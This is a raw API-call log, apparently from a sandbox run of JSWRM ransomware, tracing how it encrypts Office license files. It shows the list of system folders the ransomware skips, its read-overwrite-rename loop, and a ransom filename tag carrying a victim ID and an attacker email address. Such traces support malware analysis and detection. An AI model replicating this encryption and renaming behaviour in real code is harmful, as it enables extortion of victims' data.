lpWideCharStr="HomeStudentR_Trial2-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0103.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0103.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial2-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241380, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Trial2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0103.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0103.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0103.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0103.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0103.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.907] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11167) returned 1 [0103.907] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b90) returned 0x24c1d0 [0103.907] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b90, lpOverlapped=0x0) returned 1 [0103.909] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.909] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b90, lpOverlapped=0x0) returned 1 [0103.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.909] CloseHandle (hObject=0x45c) returned 1 [0103.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0103.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0103.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0103.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0103.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0103.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0103.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0103.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0103.910] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0103.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0103.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0103.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0103.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0103.911] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe48a788d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe48a788d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe49664a2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x54e0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_Trial2-ppd.xrm-ms", cAlternateFileName="HO2F4B~1.XRM")) returned 1 [0103.911] lstrcmpiW (lpString1="HomeStudentR_Trial2-ppd.xrm-ms", lpString2=".") returned 1 [0103.911] lstrcmpiW (lpString1="HomeStudentR_Trial2-ppd.xrm-ms", lpString2="..") returned 1 [0103.911] lstrcmpiW (lpString1="HomeStudentR_Trial2-ppd.xrm-ms", lpString2="...") returned 1 [0103.911] lstrcmpiW (lpString1="HomeStudentR_Trial2-ppd.xrm-ms", lpString2="windows") returned -1 [0103.911] lstrcmpiW (lpString1="HomeStudentR_Trial2-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.911] lstrcmpiW (lpString1="HomeStudentR_Trial2-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.911] lstrcmpiW (lpString1="HomeStudentR_Trial2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.911] lstrcmpiW (lpString1="HomeStudentR_Trial2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.911] lstrcmpiW (lpString1="HomeStudentR_Trial2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.911] lstrcmpiW (lpString1="HomeStudentR_Trial2-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0103.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial2-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0103.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0103.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial2-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2413a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Trial2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0103.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0103.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0103.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial2-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0103.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0103.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial2-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241290, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Trial2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0103.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0103.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0103.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0103.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0103.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.912] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21728) returned 1 [0103.912] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x54e0) returned 0x24c1d0 [0103.912] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x54e0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x54e0, lpOverlapped=0x0) returned 1 [0103.915] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.915] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x54e0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x54e0, lpOverlapped=0x0) returned 1 [0103.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.915] CloseHandle (hObject=0x45c) returned 1 [0103.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0103.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0103.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0103.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0103.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0103.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0103.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.916] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0103.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0103.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0103.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0103.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0103.917] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4881625, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4881625, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe49401ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d64, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_Trial2-ul-oob.xrm-ms", cAlternateFileName="HO0E95~1.XRM")) returned 1 [0103.917] lstrcmpiW (lpString1="HomeStudentR_Trial2-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.917] lstrcmpiW (lpString1="HomeStudentR_Trial2-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.917] lstrcmpiW (lpString1="HomeStudentR_Trial2-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.917] lstrcmpiW (lpString1="HomeStudentR_Trial2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.917] lstrcmpiW (lpString1="HomeStudentR_Trial2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.917] lstrcmpiW (lpString1="HomeStudentR_Trial2-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.917] lstrcmpiW (lpString1="HomeStudentR_Trial2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.917] lstrcmpiW (lpString1="HomeStudentR_Trial2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.917] lstrcmpiW (lpString1="HomeStudentR_Trial2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.917] lstrcmpiW (lpString1="HomeStudentR_Trial2-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0103.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial2-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0103.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial2-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Trial2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0103.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0103.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0103.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial2-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0103.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial2-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Trial2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0103.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0103.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0103.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0103.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0103.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.918] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11620) returned 1 [0103.918] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0103.918] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0103.920] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.920] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0103.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.920] CloseHandle (hObject=0x45c) returned 1 [0103.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0103.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0103.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0103.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0103.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0103.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0103.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.921] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0103.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0103.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0103.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.922] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33b97b57, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x33b97b57, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x33b97b57, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0103.922] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0103.922] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0103.922] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0103.922] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0103.922] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0103.922] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0103.922] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0103.922] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0103.922] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0103.922] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0103.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0103.922] 